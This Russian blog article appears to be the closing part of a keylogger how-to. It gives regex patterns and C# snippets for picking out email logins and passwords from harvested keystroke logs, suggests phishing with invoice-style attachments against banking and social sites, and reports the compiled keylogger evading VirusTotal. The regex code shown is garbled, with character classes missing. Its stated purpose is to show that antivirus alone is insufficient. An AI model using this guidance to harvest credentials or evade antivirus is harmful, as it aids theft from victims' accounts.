Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.

Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:

1. //Ищем почтовый адрес 2. ^+(\.+)*@(((+\.)+{2,4})|(({1,3}\.){3}{1,3}))$ 3. 4. 5. //Ищем пароль 6. (?=^.{6,}$)(?=.*\d)(?=.*)

Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.
Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.

Для C# это выглядит так:

1. Regex re = new Regex(@»^+(\.+)*@(((+\.)+{2,4})|(({1,3}\.){3}{1,3}))$»); 2. Regex re2 = new Regex(@»(?=^.{6,}$)(?=.*\d)(?=.*)»); 3. string email = «Oded.awask@gmail.com»; 4. string pass = «abcde3FG»; 5. Match result = re.Match(email); 6. Match result2 = re2.Match(pass);

Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.

Бесплатно и полностью не обнаружим

В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут.
Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения.

Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ?

Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось.

В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.

Основная цель этой статьи – показать, что используя одни только антивирусы вы не сможете полностью обеспечить безопасность на предприятии. Нужен более глубинная оценка действий всех пользователей и даже сервисов, чтобы выявить потенциально вредоносные действия.

В следующих статья я покажу, как сделать действительно не обнаружимую версию такого ПО.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *